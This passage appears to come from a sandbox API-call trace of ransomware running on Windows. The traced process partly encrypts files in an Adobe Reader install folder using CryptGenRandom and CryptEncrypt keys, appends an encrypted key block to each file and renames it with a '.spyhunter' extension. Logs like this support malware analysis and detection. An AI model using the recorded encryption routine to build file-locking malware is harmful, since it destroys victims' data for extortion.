(in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.829] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf94c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf90c, lpOverlapped=0x0 | out: lpBuffer=0x25cf94c*, lpNumberOfBytesWritten=0x25cf90c*=0x4, lpOverlapped=0x0) returned 1 [0118.841] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf90c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf90c*=0x30, lpOverlapped=0x0) returned 1 [0118.841] CloseHandle (hObject=0x16c) returned 1 [0118.841] GetProcessHeap () returned 0x2c0000 [0118.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0118.842] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Search.api.spyhunter") returned 81 [0118.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Search.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\search.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Search.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\search.api.spyhunter")) returned 1 [0118.843] GetProcessHeap () returned 0x2c0000 [0118.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0118.843] GetProcessHeap () returned 0x2c0000 [0118.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0118.843] GetProcessHeap () returned 0x2c0000 [0118.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d6c8 | out: hHeap=0x2c0000) returned 1 [0118.843] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf950 | out: pbBuffer=0x25cf950) returned 1 [0118.843] GetProcessHeap () returned 0x2c0000 [0118.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0118.843] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf948*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf948*=0x30) returned 1 [0118.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\reflow.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\reflow.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0118.844] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\reflow.api") returned 71 [0118.844] StrStrW (lpFirst="reflow.api", lpSrch=".txt") returned 0x0 [0118.844] GetProcessHeap () returned 0x2c0000 [0118.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.844] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf90c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf90c*=0x2800, lpOverlapped=0x0) returned 1 [0118.933] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.933] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf90c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf90c*=0x2800, lpOverlapped=0x0) returned 1 [0118.933] GetProcessHeap () returned 0x2c0000 [0118.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.933] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.933] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf94c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf90c, lpOverlapped=0x0 | out: lpBuffer=0x25cf94c*, lpNumberOfBytesWritten=0x25cf90c*=0x4, lpOverlapped=0x0) returned 1 [0119.004] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf90c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf90c*=0x30, lpOverlapped=0x0) returned 1 [0119.004] CloseHandle (hObject=0x16c) returned 1 [0119.005] GetProcessHeap () returned 0x2c0000 [0119.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0119.005] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\reflow.api.spyhunter") returned 81 [0119.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\reflow.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\reflow.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\reflow.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\reflow.api.spyhunter")) returned 1 [0119.006] GetProcessHeap () returned 0x2c0000 [0119.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0119.006] GetProcessHeap () returned 0x2c0000 [0119.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0119.006] GetProcessHeap () returned 0x2c0000 [0119.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e010 | out: hHeap=0x2c0000) returned 1 [0119.006] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf948 | out: pbBuffer=0x25cf948) returned 1 [0119.006] GetProcessHeap () returned 0x2c0000 [0119.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0119.006] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf940*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf940*=0x30) returned 1 [0119.006] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\3difr.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\3difr.x3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0119.025] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\3difr.x3d") returned 72 [0119.025] StrStrW (lpFirst="3difr.x3d", lpSrch=".txt") returned 0x0 [0119.025] GetProcessHeap () returned 0x2c0000 [0119.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0119.025] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf904, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf904*=0x2800, lpOverlapped=0x0) returned 1 [0119.059] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.059] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf904, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf904*=0x2800, lpOverlapped=0x0) returned 1 [0119.060] GetProcessHeap () returned 0x2c0000 [0119.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0119.060] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.060] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf944*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf904, lpOverlapped=0x0 | out: lpBuffer=0x25cf944*, lpNumberOfBytesWritten=0x25cf904*=0x4, lpOverlapped=0x0) returned 1 [0119.071] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf904, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf904*=0x30, lpOverlapped=0x0) returned 1 [0119.071] CloseHandle (hObject=0xf4) returned 1 [0119.071] GetProcessHeap () returned 0x2c0000 [0119.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.071] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\3difr.x3d.spyhunter") returned 82 [0119.072] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\3difr.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\3difr.x3d"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\3difr.x3d.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\3difr.x3d.spyhunter")) returned 1 [0119.073] GetProcessHeap () returned 0x2c0000 [0119.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.073] GetProcessHeap () returned 0x2c0000 [0119.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0119.073] GetProcessHeap () returned 0x2c0000 [0119.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44528 | out: hHeap=0x2c0000) returned 1 [0119.076] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf940 | out: pbBuffer=0x25cf940) returned 1 [0119.076] GetProcessHeap () returned 0x2c0000 [0119.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0119.076] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf938*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf938*=0x30) returned 1 [0119.076] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\ADMPlugin.apl" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\admplugin.apl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0119.077] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\ADMPlugin.apl") returned 75 [0119.077] StrStrW (lpFirst="ADMPlugin.apl", lpSrch=".txt") returned 0x0 [0119.078] GetProcessHeap () returned 0x2c0000 [0119.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0119.078] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf8fc*=0x2800, lpOverlapped=0x0) returned 1 [0119.132] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.132] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf8fc*=0x2800, lpOverlapped=0x0) returned 1 [0119.132] GetProcessHeap () returned 0x2c0000 [0119.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0119.132] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.132] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf93c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8fc, lpOverlapped=0x0 | out: lpBuffer=0x25cf93c*, lpNumberOfBytesWritten=0x25cf8fc*=0x4, lpOverlapped=0x0) returned 1 [0119.152] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8fc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8fc*=0x30, lpOverlapped=0x0) returned 1 [0119.152] CloseHandle (hObject=0xf4) returned 1 [0119.152] GetProcessHeap () returned 0x2c0000 [0119.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.152] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\ADMPlugin.apl.spyhunter") returned 85 [0119.152] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\ADMPlugin.apl" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\admplugin.apl"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\ADMPlugin.apl.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\admplugin.apl.spyhunter")) returned 1 [0119.153] GetProcessHeap () returned 0x2c0000 [0119.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.153] GetProcessHeap () returned 0x2c0000 [0119.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0119.153] GetProcessHeap () returned 0x2c0000 [0119.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e448a8 | out: hHeap=0x2c0000) returned 1 [0119.155] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf938 | out: pbBuffer=0x25cf938) returned 1 [0119.155] GetProcessHeap () returned 0x2c0000 [0119.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0119.155] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf930*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf930*=0x30) returned 1 [0119.155] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\Services.cfg" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\services.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0119.156] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\Services.cfg") returned 73 [0119.156] StrStrW (lpFirst="Services.cfg", lpSrch=".txt") returned 0x0 [0119.156] GetProcessHeap () returned 0x2c0000 [0119.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0119.156] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf8f4*=0x2800, lpOverlapped=0x0) returned 1 [0119.164] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.164] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf8f4*=0x2800, lpOverlapped=0x0) returned 1 [0119.164] GetProcessHeap () returned 0x2c0000 [0119.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0119.164] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.164] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf934*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8f4, lpOverlapped=0x0 | out: lpBuffer=0x25cf934*, lpNumberOfBytesWritten=0x25cf8f4*=0x4, lpOverlapped=0x0) returned 1 [0119.188] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8f4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8f4*=0x30, lpOverlapped=0x0) returned 1 [0119.188] CloseHandle (hObject=0xf4) returned 1 [0119.188] GetProcessHeap () returned 0x2c0000 [0119.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.188] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\Services.cfg.spyhunter") returned 83 [0119.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\Services.cfg" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\services.cfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\Services.cfg.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\services.cfg.spyhunter")) returned 1 [0119.189] GetProcessHeap () returned 0x2c0000 [0119.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.189] GetProcessHeap () returned 0x2c0000 [0119.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0119.189] GetProcessHeap () returned 0x2c0000 [0119.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44448 | out: hHeap=0x2c0000) returned 1 [0119.190] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf938 | out: pbBuffer=0x25cf938) returned 1 [0119.190] GetProcessHeap () returned 0x2c0000 [0119.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0119.190] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf930*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf930*=0x30) returned 1 [0119.190] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RTC.der" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rtc.der"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0119.196] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RTC.der") returned 59 [0119.199] StrStrW (lpFirst="RTC.der", lpSrch=".txt") returned 0x0 [0119.199] GetProcessHeap () returned 0x2c0000 [0119.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0119.199] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8f4*=0x44a, lpOverlapped=0x0) returned 1 [0119.204] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffbb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.204] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x44a, lpNumberOfBytesWritten=0x25cf8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8f4*=0x44a, lpOverlapped=0x0) returned 1 [0119.204] GetProcessHeap () returned 0x2c0000 [0119.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0119.205] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.205] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf934*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8f4, lpOverlapped=0x0 | out: lpBuffer=0x25cf934*, lpNumberOfBytesWritten=0x25cf8f4*=0x4, lpOverlapped=0x0) returned 1 [0119.205] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8f4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8f4*=0x30, lpOverlapped=0x0) returned 1 [0119.205] CloseHandle (hObject=0xf4) returned 1 [0119.205] GetProcessHeap () returned 0x2c0000 [0119.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0119.206] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RTC.der.spyhunter") returned 69 [0119.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RTC.der" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rtc.der"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RTC.der.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rtc.der.spyhunter")) returned 1 [0119.207] GetProcessHeap () returned 0x2c0000 [0119.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0119.207] GetProcessHeap () returned 0x2c0000 [0119.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0119.208] GetProcessHeap () returned 0x2c0000 [0119.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de3568 | out: hHeap=0x2c0000) returned 1 [0119.208] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf930 | out: pbBuffer=0x25cf930) returned 1 [0119.208] GetProcessHeap () returned 0x2c0000 [0119.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0119.208] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf928*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf928*=0x30) returned 1 [0119.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\reader_sl.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0119.208] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe") returned 65 [0119.208] StrStrW (lpFirst="reader_sl.exe", lpSrch=".txt") returned 0x0 [0119.208] GetProcessHeap () returned 0x2c0000 [0119.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0119.209] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8ec*=0x2800, lpOverlapped=0x0) returned 1 [0119.240] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.240] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8ec*=0x2800, lpOverlapped=0x0) returned 1 [0119.241] GetProcessHeap () returned 0x2c0000 [0119.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0119.241] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.241] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf92c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8ec, lpOverlapped=0x0 | out: lpBuffer=0x25cf92c*, lpNumberOfBytesWritten=0x25cf8ec*=0x4, lpOverlapped=0x0) returned 1 [0119.242] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8ec*=0x30, lpOverlapped=0x0) returned 1 [0119.242] CloseHandle (hObject=0xf4) returned 1 [0119.242] GetProcessHeap () returned 0x2c0000 [0119.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0119.243] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe.spyhunter") returned 75 [0119.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\reader_sl.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe.spyhunter" (normalized: "c:\\program files 